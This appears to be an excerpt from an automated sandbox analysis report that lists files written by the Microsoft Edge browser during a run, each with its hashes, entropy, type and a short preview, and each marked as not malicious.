Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF4beb8.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336394944460292
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
MD5:	BF6BA1797785A5763A0088569A24FE85
SHA1:	62B9D7386B7BDD97B816063ED0D9CC0D912EB130
SHA-256:	40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
SHA-512:	FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF69f9e.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336394944460292
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
MD5:	BF6BA1797785A5763A0088569A24FE85
SHA1:	62B9D7386B7BDD97B816063ED0D9CC0D912EB130
SHA-256:	40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
SHA-512:	FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF6ef92.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336394944460292
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
MD5:	BF6BA1797785A5763A0088569A24FE85
SHA1:	62B9D7386B7BDD97B816063ED0D9CC0D912EB130
SHA-256:	40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
SHA-512:	FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.323661194647246
Encrypted:	false
SSDEEP:	48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9W4:OIEumQv8m1ccnvS6tptaD62Rm1Nt9cyv
MD5:	18AAFBA1701A990EF9894E9ECDFFC803
SHA1:	FC888CD18D0E9C00048CE77C6D67F4FC982D50F9
SHA-256:	07995E076B986ED9A0F18D39B194BCE44434AAA58621D85869BC6E9664BE6EA2
SHA-512:	29018BE82ABB2A3D2B46D1002CF2DA1B655C0223F8CC7A594A77C48556B57BB67DC8CBFFF6AE6F1AFC35CEF07B21865FBE8E6A93452C859ECFDA38138826E6DE
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3b372.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3c1ea.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF54c81.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF5c57a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries~RF573d0.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries~RF62117.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\aa3ec778-b144-46c6-b6d3-afcac4ac538c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ab06a3ed-de36-4793-8ca3-847a71e0e9a8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\b885a0ee-43cf-45b1-a1b3-5d5028b4d83b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\be7fa083-6e94-4375-ad7e-6fb0ac9d95ac.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ce1867e0-c703-4933-b520-1e055912c849.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1546
Entropy (8bit):	5.3410818501136585
Encrypted:	false
SSDEEP:	24:YcFGJ/I3RdsWCyZVMdmRds+ZFRudFGRw6C1E6ma3yeesw6maPsRdsgJZC52HHbxQ:YcgCzsWvts6fc7aleeBkEsOCgHHbx9+
MD5:	D1D6949F479175C97577EF14FE087834
SHA1:	715E0BFF91A634807C278831FD1FD65579B19985
SHA-256:	6176252F1F12024CBFC6AB00AF70AC3CB80B3E8FC3CC83552B168CC7AEF86A96
SHA-512:	AAAADB1CFF433065BDD100CD5FB2426370B8A5F6D0B5F4E17A71C8C22BB60F4EC582217211E85ECF7619F6E985D2FABB3DD79D799890BC4FDE932211755B6BA7
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378592379151606","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378592381489968","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\db3a7b8e-a61a-4cdc-9ff5-6b7ec58ac2bb.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	1546
Entropy (8bit):	5.341857150326685
Encrypted:	false
SSDEEP:	24:YcFGJ/I3RdsWCyZVMdmRds+ZFRudFGRw6C1E6ma3yeesw6maPsRdsgJZC52HHbxX:YcgCzsWvts6fc7aleeBkEsOCgHHbxo+
MD5:	28AEEA0BC87A88499DBADA0E5ACBB129
SHA1:	EFDDBF1E38561D8C371048F83B0C5DCE04F12CA1
SHA-256:	049357B758AFDDBFA19E97354C2C3D66A1E7D0FF50710BFBB36C1B67BB1F9B27
SHA-512:	820D1A7852BD2A29B93DF9C22B5D3A4520D3DFF707599AE2C18AC9CA6B02A8D7D84816A9C124E9FF0C7FA980D08EA555C59FD60154A033A3E382ABAA730124DD
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378592379151606","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378592381489968","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e65607d6-3a92-4f2e-9d6f-37eaf17ba295.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1546
Entropy (8bit):	5.3410818501136585
Encrypted:	false
SSDEEP:	48:YcgCzsWvts6fc7aleeEsOCgHAkhYhbx9+:FRvl2akeSTAkOhV9+
MD5:	1935D566681E41AFCB03226CAD6B8F1B
SHA1:	747B73C053332C0E7F06CC36DD3A3CB07FE5A422
SHA-256:	AEED092BDF16836BE6DC49986B97E2241B981F4665B1E8689B90F27504967948
SHA-512:	EF9CE34FE613995CAC63454784ADCABB002C0AC1C3B9963E844121FA416A25283CE52993615075CB4A706C1C8590B9046378CF0BDBED3BAF62686C2A08556AD6
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378592379151606","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378592381489968","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ecae049c-14ff-43a3-9697-02961efe72c5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f7f6773d-6501-4cdb-be3e-a995199b6ce4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336394944460292
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
MD5:	BF6BA1797785A5763A0088569A24FE85
SHA1:	62B9D7386B7BDD97B816063ED0D9CC0D912EB130
SHA-256:	40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
SHA-512:	FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8795710633235246
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJC8y7B62MoqsgC7zFy7S2z8ZI7J5fc:T+OUzDbg3r162M/sgCnR2ztc
MD5:	33DDE3794C3B05FABA777277F61EC4E7
SHA1:	824C0807E5345F8200FAE73EBC130071E08126C2
SHA-256:	502B296DC227590869D527C16290727B70D28033D6CDCEBD761065455268D1FC
SHA-512:	97DFD15AD8CB2C87FDAF5E8701B03A9EA6A9FF4E21E9967434256FB7CB4F3107A3E3E8F4680FE08A968A5505B1DF27DC3DF3558BB4D9FEF0B00FB1848E660476
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12489
Entropy (8bit):	5.202726220175894
Encrypted:	false
SSDEEP:	192:stxJ99QTryDigabatSuypMs6isZihUkoqww8FbV+Fj9QA66WWaFIMYVP0YJ:stxPGKSu4Ms6ifhCbGxQx6WWaTYT
MD5:	842B55834184556F4987C8DC4A56B7FA
SHA1:	025A654C62FE9D4FFA86F62A9EB657B3F08F61F4
SHA-256:	F25663269E65611A99C26B9E93C56C4E0F28BE42B95525F85B4B7AC4C45BE8FE
SHA-512:	9C069E90A4736F5987FD582132ED96715EFA5BE82C7D62D2116F9A7F2CBB3FA5088C004011476D1243661B39D1C9E74DD0833BEE7F9F40B6004CC7F36023A31A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":"